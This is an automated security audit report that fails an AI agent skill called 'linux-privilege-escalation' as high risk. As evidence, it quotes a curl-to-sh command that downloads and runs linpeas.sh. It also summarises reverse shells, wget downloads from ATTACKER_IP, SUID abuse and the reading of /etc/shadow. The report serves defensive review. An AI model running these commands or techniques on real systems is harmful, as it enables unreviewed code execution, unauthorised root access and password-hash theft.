linux-privilege-escalation
Fail
Audited by Gen Agent Trust Hub on Feb 28, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSDATA_EXFILTRATIONCREDENTIALS_UNSAFE
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill downloads and immediately executes a shell script from a third-party GitHub repository using a piped command, which bypasses security reviews of the script content.
- Evidence:
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | shin Phase 2. - [COMMAND_EXECUTION]: The skill provides a comprehensive suite of commands for gaining root access, including compiling kernel exploits and manipulating system-level permissions.
- Evidence: Extensive use of
sudo,gcc,chmod +s, andLD_PRELOADto bypass security controls. - [EXTERNAL_DOWNLOADS]: The skill encourages downloading scripts and source code from arbitrary remote servers, which could serve as a vector for malware.
- Evidence: Instructions for downloading files from
ATTACKER_IPusingwget. - [DATA_EXFILTRATION]: The skill includes multiple reverse shell one-liners designed to establish unauthorized outbound network connections.
- Evidence: Payloads for Bash, Python, and Netcat that connect to an external IP and port.
- [CREDENTIALS_UNSAFE]: The skill demonstrates how to read and extract password hashes from sensitive system files like
/etc/shadow. - Evidence: Use of SUID-enabled
base64to read shadow files for offline password cracking.
Recommendations
- HIGH: Downloads and executes remote code from: https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata